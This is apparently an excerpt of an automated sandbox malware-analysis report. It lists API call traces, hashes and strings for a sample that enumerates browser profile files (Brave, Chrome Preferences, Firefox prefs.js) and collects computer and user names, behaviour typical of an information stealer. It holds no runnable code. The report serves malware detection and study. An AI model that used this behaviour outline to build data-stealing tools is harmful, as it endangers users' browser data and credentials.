                                                            • Opcode ID: d625f88cb338b0e32b874752f0ca6a835f6f103f0e64fc7180995d2c56493058
                                                            • Instruction ID: c21fa98171918094cad8016ab14d074fa3b0d03eebcf23f4c5cd87ca699471cc
                                                            • Opcode Fuzzy Hash: d625f88cb338b0e32b874752f0ca6a835f6f103f0e64fc7180995d2c56493058
                                                            • Instruction Fuzzy Hash: 30F0E2B2641208FBE7189AA4AC49FAEB7ECE705B15F300448F504E7280D571AE40DAA1
                                                            APIs
                                                              • Part of subcall function 007478E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00746A2B), ref: 00747910
                                                              • Part of subcall function 007478E0: HeapAlloc.KERNEL32(00000000,?,?,?,00746A2B), ref: 00747917
                                                              • Part of subcall function 007478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
                                                              • Part of subcall function 00747850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
                                                              • Part of subcall function 00747850: HeapAlloc.KERNEL32(00000000,?,?,?,007311B7), ref: 00747887
                                                              • Part of subcall function 00747850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
                                                            • ExitProcess.KERNEL32 ref: 007311C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Process$AllocName$ComputerExitUser
                                                            • String ID:
                                                            • API String ID: 1004333139-0
                                                            • Opcode ID: aa9a9566fa0b43574649f2a238c5673bea03859e6b931bfeff0fc569fcf381ba
                                                            • Instruction ID: cc56c7f43beac40c48351313e904d24f80696370b8b7b40c6f2c10549534b698
                                                            • Opcode Fuzzy Hash: aa9a9566fa0b43574649f2a238c5673bea03859e6b931bfeff0fc569fcf381ba
                                                            • Instruction Fuzzy Hash: 38E012B6A2830993DA0477B0EC0EB2E339C5B54746F440824FA09D2113FF6DE840D666
                                                            APIs
                                                            • wsprintfA.USER32 ref: 007438CC
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 007438E3
                                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00743935
                                                            • StrCmpCA.SHLWAPI(?,00750F70), ref: 00743947
                                                            • StrCmpCA.SHLWAPI(?,00750F74), ref: 0074395D
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00743C67
                                                            • FindClose.KERNEL32(000000FF), ref: 00743C7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                            • String ID: !=t$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$P2#v$1#v
                                                            • API String ID: 1125553467-2019668089
                                                            • Opcode ID: 7d3c949ec6a77a090772d556049b9dc388240f6762883938f82e3814e3e904f6
                                                            • Instruction ID: cc1e202cf208ec8730f0801b544ecf1d5a01fede34e81c68acf36c938e360b1d
                                                            • Opcode Fuzzy Hash: 7d3c949ec6a77a090772d556049b9dc388240f6762883938f82e3814e3e904f6
                                                            • Instruction Fuzzy Hash: B7A124B2A14218ABDB24DF64DC89FEE7378FF84301F444588B61D96181EB759B84CF62
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00750B32,00750B2B,00000000,?,?,?,007513F4,00750B2A), ref: 0073BEF5
                                                            • StrCmpCA.SHLWAPI(?,007513F8), ref: 0073BF4D
                                                            • StrCmpCA.SHLWAPI(?,007513FC), ref: 0073BF63
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0073C7BF
                                                            • FindClose.KERNEL32(000000FF), ref: 0073C7D1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID: Brave$Google Chrome$P2#v$Preferences$\Brave\Preferences$1#v
                                                            • API String ID: 3334442632-1392536997
                                                            • Opcode ID: 5d58d9f1f8898b892f553f1a77255e36ddee6f226b4a771186fd76c0abb08d05
                                                            • Instruction ID: 5a89ec39a60c5ad6776aae47721bd1272b8d6176c4b16b93317c896cdd100e9f
                                                            • Opcode Fuzzy Hash: 5d58d9f1f8898b892f553f1a77255e36ddee6f226b4a771186fd76c0abb08d05
                                                            • Instruction Fuzzy Hash: E6425772950104F7EB15FB70DD9AEED737DAF94300F404568B90AA6181EF38AB49CB92
                                                            APIs
                                                            • wsprintfA.USER32 ref: 0074492C
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00744943
                                                            • StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                                                            • StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                                                            • FindClose.KERNEL32(000000FF), ref: 00744B92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID: %s\%s$%s\%s$%s\*$P2#v$1#v
                                                            • API String ID: 180737720-322404123
                                                            • Opcode ID: 9760baa6d42def941a280f8ec9f18d52e59f459b288440357b26494c95b97789
                                                            • Instruction ID: 2311530cd7f3242952efb01b886909b6d6666fd765cf0b6a47f5ad3c9535c3e4
                                                            • Opcode Fuzzy Hash: 9760baa6d42def941a280f8ec9f18d52e59f459b288440357b26494c95b97789
                                                            • Instruction Fuzzy Hash: FE6148B2914218ABCB24EBA0DC49FEE737CBB88701F044588B50D96141EB75EB85DF91
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00744580
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00744587
                                                            • wsprintfA.USER32 ref: 007445A6
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 007445BD
                                                            • StrCmpCA.SHLWAPI(?,00750FC4), ref: 007445EB
                                                            • StrCmpCA.SHLWAPI(?,00750FC8), ref: 00744601
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0074468B
                                                            • FindClose.KERNEL32(000000FF), ref: 007446A0
                                                            • lstrcatA.KERNEL32(?,00FCD870,?,00000104), ref: 007446C5
                                                            • lstrcatA.KERNEL32(?,00FD0790), ref: 007446D8
                                                            • lstrlenA.KERNEL32(?), ref: 007446E5
                                                            • lstrlenA.KERNEL32(?), ref: 007446F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                            • String ID: %s\%s$%s\*$P2#v$1#v
                                                            • API String ID: 13328894-4226942003
                                                            • Opcode ID: 308c93d7a138bbd86cb36cbbc01d84c7d7abfe459afb024180eaa8fefc487b81
                                                            • Instruction ID: bc1a7e68fa6e2b7b0b4e8871f20ffa9fa5ea572f95fec94c85e5096bb40e766b
                                                            • Opcode Fuzzy Hash: 308c93d7a138bbd86cb36cbbc01d84c7d7abfe459afb024180eaa8fefc487b81
                                                            • Instruction Fuzzy Hash: EF5168B2954218ABCB64EB70DC89FED737CAB94300F404588F61D96191EB789BC4DF92
                                                            APIs
                                                            • wsprintfA.USER32 ref: 00743EC3
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00743EDA
                                                            • StrCmpCA.SHLWAPI(?,00750FAC), ref: 00743F08
                                                            • StrCmpCA.SHLWAPI(?,00750FB0), ref: 00743F1E
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0074406C
                                                            • FindClose.KERNEL32(000000FF), ref: 00744081
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID: %s\%s$P2#v$1#v
                                                            • API String ID: 180737720-1025293131
                                                            • Opcode ID: 22bcb7c5f0b77e4d444b7c4cffdd4dac4c28292ea6079fce3d61fafccd36a09d
                                                            • Instruction ID: 8f2ef8c6c3554a8a5a9394c48ebae0e6a2bd1cd05bcc65438d7ec523644f655e
                                                            • Opcode Fuzzy Hash: 22bcb7c5f0b77e4d444b7c4cffdd4dac4c28292ea6079fce3d61fafccd36a09d
                                                            • Instruction Fuzzy Hash: 7F514BB2914218EBCB24FBB0DC49EED737CBB94300F404588B65D96141DB79AB85DF91
                                                            APIs
                                                            • wsprintfA.USER32 ref: 0073ED3E
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0073ED55
                                                            • StrCmpCA.SHLWAPI(?,00751538), ref: 0073EDAB
                                                            • StrCmpCA.SHLWAPI(?,0075153C), ref: 0073EDC1
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0073F2AE
                                                            • FindClose.KERNEL32(000000FF), ref: 0073F2C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID: %s\*.*$P2#v$1#v
                                                            • API String ID: 180737720-3139634048
                                                            • Opcode ID: 3a6ca9730eb3e1595631a754992207fb337bfd79557e566e7bc555aa1d6b473f
                                                            • Instruction ID: e3e28e255a7afee9c9240c86800331f2da54a1659a9b1c24e3c6312d3b795ef8
                                                            • Opcode Fuzzy Hash: 3a6ca9730eb3e1595631a754992207fb337bfd79557e566e7bc555aa1d6b473f
                                                            • Instruction Fuzzy Hash: 30E1FF72951118EAFB55FB60DC56EEE737CAF54300F4041A9B50A62092EF386F8ACF52
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00750C2E), ref: 0073DE5E
                                                            • StrCmpCA.SHLWAPI(?,007514C8), ref: 0073DEAE
                                                            • StrCmpCA.SHLWAPI(?,007514CC), ref: 0073DEC4
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0073E3E0
                                                            • FindClose.KERNEL32(000000FF), ref: 0073E3F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                            • String ID: 4s$P2#v$\*.*$1#v
                                                            • API String ID: 2325840235-1418641074
                                                            • Opcode ID: 27aa49988e4663ac981dab8452e7a33c13095a03bce54d01459e136611eabd6b
                                                            • Instruction ID: 43ad3de068561cc51e74635bd97923e93ba1983d4f4b7ed39cb7853d7c6a3f7a
                                                            • Opcode Fuzzy Hash: 27aa49988e4663ac981dab8452e7a33c13095a03bce54d01459e136611eabd6b
                                                            • Instruction Fuzzy Hash: 39F1BF71954118EAEB16EB60DC99EEE737CFF54304F8141E9A40A62091EF386F89CF52
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007515B8,00750D96), ref: 0073F71E
                                                            • StrCmpCA.SHLWAPI(?,007515BC), ref: 0073F76F
                                                            • StrCmpCA.SHLWAPI(?,007515C0), ref: 0073F785
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0073FAB1
                                                            • FindClose.KERNEL32(000000FF), ref: 0073FAC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID: P2#v$prefs.js$1#v
                                                            • API String ID: 3334442632-2885088814
                                                            • Opcode ID: f55ddb1589fb90f568e89f5ad9a5d6d906caae815867ce6fee0991a4a9808943
                                                            • Instruction ID: 948bdc1b26fad37a3a4c2b7bfea590bf62f7bfd5c490e62c9f730e4f416462ae
                                                            • Opcode Fuzzy Hash: f55ddb1589fb90f568e89f5ad9a5d6d906caae815867ce6fee0991a4a9808943
                                                            • Instruction Fuzzy Hash: 53B13671950108EBEB25FF60DC5ABEE7379AF54300F4085A8E40A96152EF386B49CF92
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007514B0,00750C2A), ref: 0073DAEB
                                                            • StrCmpCA.SHLWAPI(?,007514B4), ref: 0073DB33
                                                            • StrCmpCA.SHLWAPI(?,007514B8), ref: 0073DB49
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0073DDCC
                                                            • FindClose.KERNEL32(000000FF), ref: 0073DDDE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID: P2#v$1#v
                                                            • API String ID: 3334442632-762677545
                                                            • Opcode ID: 251cae7e3d2fa4bea9819a1f7ff99dc7a41eeedc5c79dd54f606028edb37af5f
                                                            • Instruction ID: 0a3a41a023dc791a8730fdbf4317286e0c6f9536161bf8526689472fab7ab1cb
                                                            • Opcode Fuzzy Hash: 251cae7e3d2fa4bea9819a1f7ff99dc7a41eeedc5c79dd54f606028edb37af5f
                                                            • Instruction Fuzzy Hash: 7F9146B2950104EBEB15FB70EC5A9ED737DAB84300F408568F90A96141EF3C9B59CB93
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0075516C,?,00731F2C,?,00755214,?,?,00000000,?,00000000), ref: 00731923
                                                            • StrCmpCA.SHLWAPI(?,007552BC), ref: 00731973
                                                            • StrCmpCA.SHLWAPI(?,00755364), ref: 00731989
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00731D40
                                                            • DeleteFileA.KERNEL32(00000000), ref: 00731DCA
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00731E20
                                                            • FindClose.KERNEL32(000000FF), ref: 00731E32
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
